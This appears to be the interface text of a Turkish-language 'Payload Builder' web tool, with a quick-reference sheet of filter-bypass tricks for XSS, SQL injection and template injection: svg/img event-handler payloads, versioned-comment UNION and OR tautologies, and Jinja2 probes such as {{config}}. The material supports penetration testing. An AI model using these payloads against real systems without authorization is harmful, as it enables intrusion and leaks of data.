🔨 Payload Builder

Hedefine gore payload uret

🎯 Hedef Ayarlari

XSS WAF Yok HTML Body Ham 0 payload
🔨

Secimlerini yap ve "Payload Uret" butonuna tikla.

📚 Hizli Referans

XSS Bypass Ipuclari

  • <svg/onload=alert()> — tag kisa yol
  • <img src=x onerror=alert()> — klasik
  • javascript:alert() — href/src icin
  • • Case bypass: <ScRiPt>
  • • Null byte: <scr%00ipt>

SQLi Bypass Ipuclari

  • /*!50000UNION*/ — MySQL versiyonlu yorum
  • 1'||'1'='1 — OR bypass
  • 0x27 — hex tirnak
  • CHAR(39) — char fonksiyon
  • • Bosluk bypass: /**/, %09

SSTI Bypass Ipuclari

  • {{7*7}} — temel tespit
  • ${{7*7}} — alternatif delimitör
  • #{7*7} — Ruby/Java
  • {%if 1%}yes{%endif%} — kontrol akisi
  • {{config}} — Jinja2 leak